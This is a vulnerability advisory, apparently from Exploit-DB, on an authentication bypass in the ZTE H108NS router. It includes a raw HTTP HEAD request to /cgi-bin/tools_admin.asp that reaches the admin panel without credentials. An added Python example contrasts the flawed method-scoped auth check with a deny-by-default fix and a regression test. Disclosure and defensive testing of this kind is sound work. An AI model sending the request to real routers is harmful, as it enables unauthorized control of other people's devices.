Vendor: H108NS
By: George Tsimpidas
N/A
CVSS
N/A
Authentication Bypass
CWE
Product Name: H108NS
Affected Version From: H108NSV1.0.7u_ZRD_GR2_A68
Affected Version To: H108NSV1.0.7u_ZRD_GR2_A68
Patch Exists:
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Debian 5.18.5
2022

Router ZTE-H108NS – Authentication Bypass

When specific HTTP methods are listed within a security constraint, only those methods are protected. The ZTE-H108NS router defines the following HTTP methods: GET, POST, and HEAD. The HEAD method seems to fall under a flawed operation that allows HEAD to be implemented correctly with every response status code. The request below successfully bypasses Basic Authentication and grants access to the router's Administration Panel.

Mitigation:

Exploit-DB raw data:

# Exploit Title: Router ZTE-H108NS - Authentication Bypass
# Date: 19-11-2022
# Exploit Author: George Tsimpidas 
# Vendor: https://www.zte.com.cn/global/
# Firmware: H108NSV1.0.7u_ZRD_GR2_A68
# CVE: N/A 
# Tested on: Debian 5.18.5

Description :

When specific HTTP methods are listed within a security constraint,
only those methods are protected. The ZTE-H108NS router defines the
following HTTP methods: GET, POST, and HEAD. The HEAD method seems to
fall under a flawed operation that allows HEAD to be implemented
correctly with every response status code.


Proof Of Concept :

The request below successfully bypasses Basic Authentication and
grants access to the router's Administration Panel.


HEAD /cgi-bin/tools_admin.asp HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: SESSIONID=1cd6bb77
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
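
The following is an added example, not code from the advisory or from the router firmware, whose logic is not shown on this page. It models the general pattern the description names: an authentication check scoped to a list of methods, beside a check keyed on the path with unknown methods rejected. The function names, the credentials and the assumption that HEAD sits outside the enforced list are all constructed for illustration.

```python
import base64
import hmac

# Constructed values for illustration; not taken from the router firmware.
PROTECTED_PREFIX = "/cgi-bin/"
ADMIN_USER, ADMIN_PASS = "admin", "example-password"
ALLOWED_METHODS = {"GET", "POST", "HEAD"}


def credentials_ok(headers):
    """Validate an HTTP Basic Authorization header in constant time."""
    scheme, _, token = headers.get("Authorization", "").partition(" ")
    if scheme.lower() != "basic":
        return False
    try:
        decoded = base64.b64decode(token, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return False
    expected = f"{ADMIN_USER}:{ADMIN_PASS}"
    return hmac.compare_digest(decoded.encode(), expected.encode())


def status_method_listed(method, path, headers, enforced=("GET", "POST")):
    """Flawed pattern (assumed): auth runs only for methods in `enforced`."""
    if path.startswith(PROTECTED_PREFIX) and method in enforced:
        if not credentials_ok(headers):
            return 401
    return 200  # any method outside `enforced` reaches the handler


def status_deny_by_default(method, path, headers):
    """Hardened pattern: the auth check depends on the path, not the method."""
    if method not in ALLOWED_METHODS:
        return 405
    if path.startswith(PROTECTED_PREFIX) and not credentials_ok(headers):
        return 401
    return 200


def methods_reaching_handler(gate, path,
                             methods=("GET", "POST", "HEAD", "OPTIONS", "PUT")):
    """Regression check: methods that get 200 on `path` with no credentials."""
    return [m for m in methods if gate(m, path, {}) == 200]
```

Running `methods_reaching_handler` against each protected path in a test suite turns this class of bug into a failing test: the list must be empty for every path that requires authentication.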